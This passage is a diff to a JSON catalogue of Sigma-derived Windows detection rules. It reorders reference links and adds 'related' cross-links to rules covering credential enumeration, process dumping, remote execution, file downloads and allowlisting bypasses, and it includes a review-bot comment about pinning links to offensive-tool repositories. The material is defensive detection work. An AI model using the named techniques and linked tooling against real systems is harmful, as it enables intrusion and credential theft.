"https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml" ], "tags": [ @@ -52133,6 +67195,15 @@ "attack.privilege_escalation" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", "value": "SysmonEOP Hack Tool" }, 
@@ -52157,6 +67228,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", "value": "Python Spawning Pretty TTY on Windows" }, @@ -52173,8 +67253,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Replace/", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/replace", + "https://lolbas-project.github.io/lolbas/Binaries/Replace/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml" ], "tags": [ @@ -52182,6 +67262,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9292293b-8496-4715-9db6-37028dcda4b3", "value": "Replace.exe Usage" }, @@ -52206,6 +67295,15 @@ "attack.t1070.005" ] }, + "related": [ + { + "dest-uuid": "a750a9f6-0bde-4bb3-9aae-1e2786e9780c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cb7c4a03-2871-43c0-9bbb-18bbdb079896", "value": "Mounted Share Deleted" }, @@ -52233,6 +67331,15 @@ "attack.execution" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b97cd4b1-30b8-4a9d-bd72-6293928d52bc", "value": "Indirect Command Execution By Program Compatibility Wizard" }, 
@@ -52259,6 +67366,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9c14c9fa-1a63-4a64-8e57-d19280559490", "value": "Invoke-Obfuscation Via Stdin" }, @@ -52283,6 +67399,15 @@ "attack.t1127" ] }, + "related": [ + { + "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a01b8329-5953-4f73-ae2d-aa01e1f35f00", "value": "Suspicious aspnet_compiler.exe Execution" }, @@ -52299,8 +67424,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hvs-consulting.de/lazarus-report/", "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/", + "https://www.hvs-consulting.de/lazarus-report/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_loader.yml" ], "tags": [ @@ -52309,6 +67434,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7b49c990-4a9a-4e65-ba95-47c9cc448f6e", "value": "Lazarus Loaders" }, 
@@ -52325,9 +67459,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md", "https://www.joeware.net/freetools/tools/adfind/", + "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adfind_enumeration.yml" ], "tags": [ @@ -52373,8 +67507,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://redcanary.com/blog/child-processes/", "https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/scrcons-exe-rare-child-process.html", + "https://redcanary.com/blog/child-processes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_script_event_consumer_spawn.yml" ], "tags": [ @@ -52382,6 +67516,15 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", "value": "Script Event Consumer Spawning Process" }, @@ -52406,6 +67549,15 @@ "attack.t1069.001" ] }, + "related": [ + { + "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "164eda96-11b2-430b-85ff-6a265c15bf32", "value": "Suspicious Get Local Groups Information with WMIC" }, 
@@ -52422,8 +67574,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_command.yml" ], "tags": [ @@ -52431,6 +67583,15 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e42af9df-d90b-4306-b7fb-05c863847ebd", "value": "WMI Remote Command Execution" }, @@ -52447,8 +67608,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/ch2sh/Jlaive", "https://jstnk9.github.io/jstnk9/research/Jlaive-Antivirus-Evasion-Tool", + "https://github.com/ch2sh/Jlaive", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_jlaive_batch_execution.yml" ], "tags": [ @@ -52456,6 +67617,15 @@ "attack.t1059.003" ] }, + "related": [ + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0a99eb3e-1617-41bd-b095-13dc767f3def", "value": "Jlaive Usage For Assembly Execution In-Memory" }, 
@@ -52473,8 +67643,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc.yml" ], "tags": [ @@ -52509,6 +67679,22 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d08a2711-ee8b-4323-bdec-b7d85e892b31", "value": "CsExec Remote Execution Tool Usage" }, @@ -52525,8 +67711,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", "https://lolbas-project.github.io/lolbas/Binaries/Regini/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_ads.yml" ], 
@@ -52559,6 +67745,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f", "value": "Potential Download/Upload Activity Using Type Command" }, @@ -52584,6 +67779,15 @@ "attack.t1218.005" ] }, + "related": [ + { + "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b98d0db6-511d-45de-ad02-e82a98729620", "value": "Mshta Remotely Hosted HTA File Execution" }, @@ -52600,9 +67804,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", - "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_sc_to_hide_sevices.yml" ], "tags": [ @@ -52628,8 +67832,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry", "https://github.com/HyperSine/how-does-MobaXterm-encrypt-password", + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry", "https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt", "https://isc.sans.edu/diary/More+Data+Exfiltration/25698", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_cli.yml" 
@@ -52639,6 +67843,15 @@ "attack.t1552.002" ] }, + "related": [ + { + "dest-uuid": "341e222a-a6e3-4f6f-b69c-831d792b1580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "87a476dc-0079-4583-a985-dee7a20a03de", "value": "Enumeration for 3rd Party Creds From CLI" }, @@ -52684,6 +67897,15 @@ "attack.t1560.001" ] }, + "related": [ + { + "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4ede543c-e098-43d9-a28f-dd784a13132f", "value": "Winrar Execution in Non-Standard Folder" }, @@ -52708,6 +67930,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "aa8e035d-7be4-48d3-a944-102aec04400d", "value": "Suspicious Extrac32 Execution" }, @@ -52724,8 +67955,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/sensepost/ruler", "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + "https://github.com/sensepost/ruler", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_outlook.yml" ], "tags": [ @@ -52734,6 +67965,22 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e212d415-0e93-435f-9e1a-f29005bb4723", "value": "Suspicious Execution from Outlook" }, 
@@ -52797,17 +68044,19 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", - "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", - "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", - "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", - "https://adsecurity.org/?p=2921", - "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", - "https://github.com/calebstewart/CVE-2021-1675", - "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://adsecurity.org/?p=2921", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", + "https://github.com/calebstewart/CVE-2021-1675", + "https://github.com/HarmJ0y/DAMP", + "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", + "https://github.com/samratashok/nishang", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malicious_cmdlets.yml" ], "tags": [ @@ -52823,6 +68072,43 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "02030f2f-6199-49ec-b258-ea71b07e03dc", "value": "Malicious PowerShell Commandlets - ProcessCreation" }, @@ -52847,6 +68133,15 @@ "attack.t1070.004" ] }, + "related": [ + { + "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "204b17ae-4007-471b-917b-b917b315c5db", "value": "Suspicious Del in CommandLine" }, 
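Review bot: The two references added to the Malicious PowerShell Commandlets rule, `https://github.com/HarmJ0y/DAMP` and `https://github.com/samratashok/nishang`, point at repository roots, while the other GitHub refs in the same list are pinned to a commit (`.../DomainPasswordSpray/blob/b13d64a5.../DomainPasswordSpray.ps1`, `.../nishang/blob/414ee110.../Gather/Copy-VSS.ps1` in the NTDS rule above). Unpinned links to offensive-tooling repos can be rewritten, renamed or hijacked, so an analyst following them later may not see the cmdlet names the detection was written against. Pin them to a tree or blob at a specific commit; as with the other refs this is inherited from the Sigma rule and should be corrected there so the generator carries it through.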
@@ -52894,6 +68189,22 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7cce6fc8-a07f-4d84-a53e-96e1879843c9", "value": "Potential Binary Impersonating Sysinternals Tools" }, @@ -52978,9 +68289,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt", "https://twitter.com/bigmacjpg/status/1349727699863011328?s=12", "https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/", - "http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_finger_usage.yml" ], "tags": [ @@ -52988,6 +68299,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "af491bca-e752-4b44-9c86-df5680533dbc", "value": "Finger.exe Suspicious Invocation" }, @@ -53014,6 +68334,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "729ce0ea-5d8f-4769-9762-e35de441586d", "value": "MpiExec Lolbin" }, 
@@ -53030,8 +68359,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-1---system-information-discovery", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-1---system-information-discovery", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_systeminfo.yml" ], "tags": [ @@ -53056,8 +68385,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0", - "https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab", "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", + "https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_diagcab.yml" ], "tags": [ @@ -53065,6 +68394,15 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6545ce61-a1bd-4119-b9be-fcbee42c0cf3", "value": "Execute MSDT.EXE Using Diagcab File" }, 
@@ -53081,10 +68419,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/jseerden/status/1247985304667066373/photo/1", "https://twitter.com/lefterispan/status/1286259016436514816", - "https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/", + "https://twitter.com/jseerden/status/1247985304667066373/photo/1", + "https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml" ], "tags": [ @@ -53092,6 +68430,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7efd2c8d-8b18-45b7-947d-adfe9ed04f61", "value": "AgentExecutor PowerShell Execution" }, @@ -53118,6 +68465,15 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c4e49831-1496-40cf-8ce1-b53f942b02f9", "value": "Renamed PAExec" }, @@ -53141,6 +68497,15 @@ "attack.t1048" ] }, + "related": [ + { + "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "99793437-3e16-439b-be0f-078782cf953d", "value": "Tap Installer Execution" }, @@ -53166,6 +68531,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", "value": "UAC Bypass Using NTFS Reparse Point - Process" }, 
@@ -53192,6 +68566,15 @@ "attack.t1021.001" ] }, + "related": [ + { + "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "327f48c1-a6db-4eb8-875a-f6981f1b0183", "value": "Suspicious SSH Port Forwarding" }, @@ -53217,6 +68600,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d22e2925-cfd8-463f-96f6-89cec9d9bc5f", "value": "Application Whitelisting Bypass via PresentationHost.exe" }, @@ -53234,9 +68626,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809", "https://twitter.com/cyb3rops/status/1514217991034097664", "https://www.bleepingcomputer.com/startups/RpcSs.exe-14544.html", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rpcss_anomalies.yml" ], "tags": [ @@ -53246,6 +68638,22 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a7cd7306-df8b-4398-b711-6f3e4935cf16", "value": "Remote Procedure Call Service Anomaly" }, 
@@ -53271,6 +68679,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "60f16a96-db70-42eb-8f76-16763e333590", "value": "Application Whitelisting Bypass via Dxcap.exe" }, @@ -53297,6 +68714,15 @@ "attack.t1486" ] }, + "related": [ + { + "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "689308fc-cfba-4f72-9897-796c1dc61487", "value": "Conti Ransomware Execution" }, @@ -53321,6 +68747,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "57bff678-25d1-4d6c-8211-8ca106d12053", "value": "Use of ScreenConnect Remote Access Software" }, @@ -53337,8 +68772,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/mrd0x/status/1511489821247684615", "https://twitter.com/mrd0x/status/1511415432888131586", + "https://twitter.com/mrd0x/status/1511489821247684615", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_susp_dumpminitool.yml" ], "tags": [ @@ -53347,6 +68782,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "eb1c4225-1c23-4241-8dd4-051389fde4ce", "value": "Suspicious DumpMinitool Usage" }, 
@@ -53363,8 +68807,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/",
 "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/",
+ "http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml"
 ],
 "tags": [
@@ -53412,8 +68856,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md",
+ "https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_time_discovery.yml"
 ],
 "tags": [
@@ -53447,6 +68891,22 @@
 "attack.t1105"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "21dd6d38-2b18-4453-9404-a0fe4a0cc288",
 "value": "Curl Start Combination"
 },
@@ -53471,6 +68931,15 @@
 "attack.t1202"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "7dc2dedd-7603-461a-bc13-15803d132355",
 "value": "Conhost Parent Process Executions"
 },
@@ -53487,8 +68956,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://mobile.twitter.com/0gtweet/status/1564131230941122561",
 "https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html",
+ "https://mobile.twitter.com/0gtweet/status/1564131230941122561",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_deviceenroller_evasion.yml"
 ],
 "tags": [
@@ -53538,8 +69007,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection",
 "https://twitter.com/vxunderground/status/1423336151860002816?s=20",
+ "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti.yml"
 ],
 "tags": [
@@ -53547,34 +69016,18 @@
 "attack.resource_development"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
